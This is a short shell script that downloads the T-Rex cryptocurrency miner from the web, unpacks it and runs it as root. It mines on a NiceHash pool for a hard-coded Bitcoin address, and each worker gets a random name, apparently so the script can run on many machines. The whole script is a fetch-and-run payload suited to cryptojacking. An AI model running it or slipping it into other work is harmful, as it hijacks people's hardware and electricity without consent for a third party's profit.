#!/bin/sh
apt-get install libpci3 && wget https://trex-miner.com/download/t-rex-0.19.14-linux-cuda11.1.tar.gz && tar -xvf t-rex-0.19.14-linux-cuda11.1.tar.gz && sudo ./t-rex -a ethash -o nicehash+tcp://daggerhashimoto.eu.nicehash.com:3353 -u 3FEDWSQcnFAc4nNgejJm2RCNS8JVCfWuf2.$(echo $(shuf -i 1-1000 -n 1)-T-Rex) -p x
